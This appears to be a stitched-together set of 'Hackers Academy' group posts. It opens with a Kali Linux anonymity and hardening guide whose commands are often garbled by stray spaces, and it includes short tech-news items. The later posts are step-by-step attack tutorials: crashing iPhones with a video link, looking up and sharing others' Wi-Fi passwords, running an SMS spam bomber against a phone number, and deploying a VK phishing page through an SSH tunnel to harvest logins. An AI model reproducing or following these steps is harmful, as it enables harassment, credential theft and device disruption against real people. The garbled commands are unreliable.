How to configure Kali Linux in terms of security and anonymity

Greetings to the Hackers!

As you asked me to post about Kali Linux. Since you didn’t like my posts about Virology Programming and SI

Okay.

I decided to roll a small article for those who just decided to master kali linux

But I will not describe specific tools, their purpose and use. I will tell you how to safely configure the system in terms of security and anonymity, which is now very relevant. So that the poor unfortunate newcomer does not scour the forum search and google, trying to get answers. For this I decided to collect the accumulated material in one place.
Healthy criticism and additions are welcome.

All the manipulations described in the article were performed on Kali 64 bit with the Gnome 3 graphical environment.

For performance on a different capacity or environment, I can not vouch. Do everything at your own peril and risk!

First, find out what bit depth your system has:

The code:

grep -qP ’^ flags \ s *:. * \ blm \ b’ / proc / cpuinfo && echo 64-bit || echo 32-bit

We write it to a USB flash drive with a volume of 4 Gb using the utility

We will install Kali Linux on a fully encrypted file system.

I won’t explain the charms of this particular installation

After the first login, disable swap through Menu-Utilities-Disks. This is the fastest way:

No need to use my instruction with rewriting swap from this topic.
It is for an already used system, but on a freshly installed one, the above is enough!
Is swap disabled, can be viewed in the System Monitor:

Check that the repositories in /etc/apt/sources.list have the form:

Check that the repositories in /etc/apt/sources.list have the form:

The code:

deb http://http.kali.org/kali kali-rolling main contrib non-free

deb-src http://http.kali.org/kali kali-rolling main contrib non-free

We make sure that each time you connect to the network, the mac changes to random.
(Thanks @ z3RoTooL for the great tip in my article)
To do this, the contents of the /etc/NetworkManager/NetworkManager.conf file are changed to:

The code:

[main]
plugins = ifupdown, keyfile

[ifupdown]
managed = false

[connection]
wifi.cloned-mac-address = random

[connection]
ethernet.cloned-mac-address = random

Now configure ssh correctly and safely, because without it, nowhere:

The code:

update-rc.d -f ssh remove
update-rc.d -f ssh defaults
cd / etc / ssh /
mkdir insecure_original_default_kali_keys
mv ssh_host_ * insecure_original_default_kali_keys /
dpkg-reconfigure openssh-server

In the configuration file / etc / ssh / sshd_config, change:

The code:

Port 22

PermitRootLogin without-password

on

The code:

Port 2282
PermitRootLogin no

Port 22 is changed to any non-standard (in our case 2282) to protect against brute force.
PermitRootLogin no prohibits other machines from connecting to the root user on our machine.
Perhaps in the future you will get your VPS. Therefore, I advise you to connect to it not with a password, but create a key, since it is safer:

The code:

ssh-keygen -t rsa

Hit Enter a few times. The generated key /root/.ssh/id_rsa.pub then put on your server.
I also do not advise adding the ssh service to startup, but starting / disabling the commands:

The code:

service ssh start
service ssh stop

Now an important point in the article. Let's make a self-destruct password for the encrypted disk headers.
In fact, without them, it turns into just a brick. There is an excellent forum article on this topic.
Let me reduce this process to a minimum:

The code:

cryptsetup luksAddNuke / dev / sda5
Enter any existing passphrase: your encryption phrase
Enter new passphrase for key slot: Self Destruct Password
Verify passphrase: Repeat password self-destruct

cryptsetup luksHeaderBackup --header-backup-file luksheader.back / dev / sda5

file luksheader.back

openssl enc -aes-256-cbc -salt -in luksheader.back -out luksheader.back.enc
enter aes-256-cbc encryption password: Password for the encrypted header
Verifying - enter aes-256-cbc encryption password: Repeat password for encrypted header

ls -lh luksheader.back *

file luksheader.back *

Files luksheader.back and luksheader.back.enc are stored on encrypted using LUKS
(can be done using Menu-Utilities-Drives) microsd flash drive somewhere outside the house.
Some kind of nest in the forest is ideal.
Now it’s time for us to update the system:

The code:

apt-get update && apt-get dist-upgrade

It is also likely to request, so we remove unnecessary packages:

The code:

apt autoremove

If in the future we want to receive updates via https, then we do:

The code:

apt install apt-transport-https

Check that the repositories in /etc/apt/sources.list have the form:

The code:

deb https://http.kali.org/kali kali-rolling main non-free contrib

deb-src https://http.kali.org/kali kali-rolling main non-free contrib

And again, update the system:

The code:

apt-get update && apt-get dist-upgrade

Soft Why so? The following is a description of why each tool is needed:

The code:

apt-get install mat steghide network-manager-openvpn-gnome secure-delete keepassx pidgin pidgin-otr etherape irssi tor lighttpd virtualbox

I also think that it’s not superfluous to install and configure something else:
Bluetooth It does not work normally, so we use the setup manual.
Ram wiping. Cleans up a core dump on reboot.
VPN I wrote an article with an example on the riseup service, but the command also works on another resource:

The code:

openvpn --client --dev tun --config YOUR_CONFIGURATION.ovpn --proto tcp

Already purchased a Wi-Fi adapter ALFA or just think? Then we write the script / bin / wlan1 with the contents:

The code:

#! / bin / sh

ifconfig wlan1 down
macchanger -r wlan1
iw reg set BZ
iwconfig wlan1 txpower 30
ifconfig wlan1 up
echo "MAC updated ..."
exit 0

and make it executable:

The code:

chmod + x / bin / wlan1

Now, when ALFA is connected and the wlan1 command is entered in the terminal, not only will the mac change, but also the power will increase.
Perhaps you need a Tor browser?
Do not forget to add the path_to / tor-browser_en-US / Browser / TorBrowser / Data / Tor / torrc to the very bottom of the line:

The code:

ExcludeNodes {ru}, {ua}, {by}

This will exclude connection to dysfunctional nodes. If the provider blocks access: That's all. Of course I can go on forever, but this is for beginners.

Thank you all for your attention.
Subscripe https://vk.com/academy_hacker
https://anonymoushackers.org/user/hackers-academy

Chinese electronics maker Hisense has announced the Hisense F40 smartphone, which is equipped with the detection function of any infrared camera, even if it is hidden.

In addition to photos of the device and a story about unusual camera modules, no other details were reported.
Hisense F40 has been certified by TENAA China Center. The smartphone is equipped with a 6.617-inch display with a resolution of 720 pixels. The phone measures 166.3 76.5 9.19 mm and weighs just 170 g.

Hisense F40 is equipped with a 5000 mAh battery (4850 mAh according to TENAA). The device runs on an unnamed processor with a clock frequency of 2.0 GHz. The site reports about 8 GB of RAM and 256 GB of internal memory, but most likely there will be other memory options.
The model stands out the ability of the camera to detect any infrared cameras nearby. The smartphone’s camera consists of a combination of 13MP + 8MP + 2MP + 2MP, all of them are located in the upper left corner vertically. While three sensors are in the same module, a fourth sensor is located under the infrared detector.
Hisense F40 will be available in Polar Night Black and Star Blue. Hisense has not yet officially announced prices and the start date of sales.
Add. at the same event, Hisense presented the new King Kong 6 smartphone, the main feature of which was a battery with an impressive capacity of 10,010 mAh. They assure that it is enough for 5 days of work.
Earlier, HB reported that the Chinese company Hisense introduced the Hisense A5 smartphone, which is equipped with an e-paper-based E-Ink screen. The manufacturer promises that Hisense A5 with such a screen is able to withstand a record 10 days of battery life.

Hisense A5 is equipped with a 5.84-inch screen with a resolution of 1440 * 720. Black-and-white screens with E-Ink technology do not have blue light emission. For night use, a “soft” adjustable backlight with 2048 levels is used. Unlike modern smartphones, the use of such a screen outdoors does not cause stress for the eyes.
Subscripe https://vk.com/academy_hacker
https://anonymoushackers.org/user/hackers-academy

Facebook user Joshua Maddex noticed the unusual behavior of the iOS version of the application. While viewing the tape, it suddenly and without the knowledge of the user gets access to the device’s camera. Roughly speaking, Facebook can spy on iPhone owners while they flip through the feed.
The case was played on five Apple devices with iOS versions 13.2.2. On iOS 12, iOS 13.1.3, and also on Google Pixel 4 with Android 10, the camera did not turn on. This is most likely a bug, although not everyone is sure about it - Facebook does not have the best reputation regarding the use of personal data.
Until the application is repaired, you can revoke the application’s permission to access the camera in the settings (some suggest temporarily denying access to the microphone).
Subscripe https://vk.com/academy_hacker
https://anonymoushackers.org/user/hackers-academy

How to disable any iOS device:

1. Find anyone with absolutely any iOS device.
2. Copy the link to the video: wylsa.com/VIDOSI/IMG_0942.mp4
3. Send to the owner of the device from paragraph 1.
4. He watch the video and after a few minutes his device crashes.
   By the way, you can restore the functionality of the device by making a Hard Reset.
   Subscribe https://vk.com/academy_hacker
   https://anonymoushackers.org/user/hackers-academy

Hello Hackers. Hackers Academy with you

Wi-Fi Space is a multi-platform service for finding vulnerable routers in any city.
https://wifispc.com/

Attention !!! There is an Android application and IOS Wifi Space.

You do not need to download them.

This is a map of open routers without passwords, and not a database of vulnerable routers.

The Wifi Space database is available at https://ru.wifispc.com

1. Go to the site and point to the search. The city where you want to see vulnerable routers. Click on any vulnerable router. You will light up its SSID and password from the router.

You can also add your own points on this site. For example, the WIFI password of your school, neighbor, etc.
Subscribe https://vk.com/academy_hacker
https://anonymoushackers.org/user/hackers-academy

Hello everyone. Hacker Academy is with you.
And so this is already 2 article about Termux.
Today we would spam using Termux.
Code:
apt update

apt upgrade

pkg install root-repo

pkg install unstable-repo

pkg install x11-repo

pkg install python

pkg install python2

pkg install git

pip2 install requests

git clone https://github.com/Noxturnix/Spammer-Grab

Using:

cd spammer-grab

python2 spammer.py (phone number without +)

Example:

python2 spammer.py 79000000000

To change the interval between sending, we write the command

Python2 spammer.py —delay (Time in sec.) (Phone number without +)

Example:

python2 spammer.py --delay 1 79000000000

That's all

Hackers Academy was with you.
Subscribe https://vk.com/academy_hacker
https://anonymoushackers.org/user/hackers-academy

Termux - emulator Terminal Android 5+
download termux for google play and f-droid
Start Termux
Code:
apt update

apt upgrade

pkg install root-repo

pkg install unstable-repo

pkg install x11-repo

pkg install python

pkg install python2

pkg install openssh

git clone https://github.com/foxlitegor/fisher

cd fisher

chmod 777 install.sh

sh install.sh

Код использование:

fish

run
And so now we are creating a new session in Termux. To do this, swipe to the right.

And click on new session.
Session 2 opened
And run using the following command
ssh -R 80: localhost: 8080 ssh.localhost.run
Next, we will be given a website address, both http and https. This is a phishing site. We follow the link. And the VK phishing page lights up. We enter the left data. And go to session 1. Swipe to the right and there will be numbers 1 and 2. Press 1. Log in. And there the login and password will glow green.

That's all. The article has come to an end. Thank you who read. Subscribe to our group. Invite your friends. Let's develop a project about hackers together

Well, you had the Hackers Academy.
Subscripe https://vk.com/academy_hacker
https://anonymoushackers.org/user/hackers-academy